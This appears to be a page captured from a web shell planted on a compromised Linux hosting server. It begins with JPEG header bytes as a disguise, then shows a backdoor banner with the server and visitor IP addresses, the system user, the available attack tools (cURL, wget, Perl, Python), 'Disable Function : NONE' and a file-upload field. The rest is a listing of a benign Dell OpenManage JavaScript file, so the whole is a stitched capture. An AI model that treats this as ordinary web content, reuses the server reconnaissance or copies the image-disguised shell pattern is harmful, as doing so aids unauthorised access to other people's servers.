����JFIF��x�x����'
| Server IP : 78.140.185.180 / Your IP : 216.73.216.38 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /opt/dell/srvadmin/lib64/openmanage/apache-tomcat/webapps/omsa/oma/js/ |
Upload File : |
//-------------------------------------------------------------------------
//
// DELL INC. PROPRIETARY INFORMATION
//
// This software is supplied under the terms of a license agreement or
// nondisclosure agreement with Dell Computer Corporation and may not
// be copied or disclosed except in accordance with the terms of that
// agreement.
//
// Copyright (c) 1995-2001 Dell Inc. All Rights Reserved.
//
// Abstract/Purpose:
//
//
// Environment:
// Windows NT/2000, Linux, Netware
//
// Created/Version:
// 2001 Jul 24 / $Revision: $
//
// Author:
// Christopher Poblete
//
// Last Modified By/On:
// $Author: $ / $Date: $
//
//-------------------------------------------------------------------------
function appendVID(url)
{
var vvid = document.getElementById("vid").value;
if((index=url.indexOf("javascript")) == -1){
if((index=url.indexOf('#')) != -1){
url = url.substring(0,index);
}
if( (url.indexOf("&vid=") == -1) && (url.indexOf("?vid=") == -1)){
if(url.indexOf('?') != -1){
url += "&vid=" + vvid;
}else{
url += "?vid=" + vvid;
}
}//vid
}//javascript
return url;
}
function checkModal ()
{
var modal = false;
try
{
modal = window.top.body.frames["ct"].g_bModal;
}
catch(e)
{
try {
modal = window.top.body.g_bModal;
}
catch(e)
{
}
}
return modal;
}
function help(page , windowid)
{
page = appendVID(page);
if (checkModal () == false)
{
var helpwin;
if (windowid == 'null') {
var n_windowid = (new Number(Math.random())).toString ();
windowid = n_windowid.substring (n_windowid.indexOf (".") +1);
}
helpwin = window.open(page, windowid, config='height=450,width=850,scrollbars=yes,toolbar=no,menubar=no,resizable=yes,location=no,directories=no,status=no');
// this brings the window to the front.
helpwin.focus();
}
}
function support(page , windowid)
{
if(page.indexOf("SecureSupportPageServlet") !=-1 )
{
page = appendVID(page);
}
if (checkModal () == false)
{
var helpwin;
if (windowid == 'null') {
var n_windowid = (new Number(Math.random())).toString ();
windowid = n_windowid.substring (n_windowid.indexOf (".") +1);
}
supportwin = window.open(page, windowid, config='height=550,width=930,scrollbars=yes,toolbar=yes,menubar=yes,resizable=yes,location=yes,directories=no,status=yes');
// this brings the window to the front.
supportwin.focus();
}
}
function about(page, windowid)
{
page = top.gnv.appendVID(page);
if (checkModal () == false) {
var aboutwin;
var n_windowid = windowid + 'about';
aboutwin = window.open(page, n_windowid, config='height=320,width=600,scrollbars=yes,toolbar=no,menubar=no,resizable=yes,location=no,directories=no,status=no');
// this brings the window to the front.
aboutwin.focus();
}
}
function closePopUpWindow ()
{
if (checkModal () == false)
parent.close();
}
function logout ()
{
if (checkModal () == false)
top.location.href=appendVID('./OMSALogout');
}
function visit (sURL)
{
if (checkModal () == false){
if (sURL.indexOf("http:") != -1 || sURL.indexOf("https:") != -1)
top.location.href= appendVID(sURL);
else
top.location.href='http://' + appendVID(sURL);
}
}
function openTaskWindow ()
{
if (checkModal () == false)
top.location.href=appendVID('./OMSATask');
}
function openPreference ()
{
if (checkModal () == false)
top.location.href=appendVID('./OMSATask?mode=pref');
}
function returnProgram (sProgram)
{
if (checkModal () == false){
URL = './SelectTask?application=' + sProgram;
top.location.href= appendVID(URL);
}
}
function gotoURL (sURL)
{
if (checkModal () == false){
top.location.href= sURL;
}
}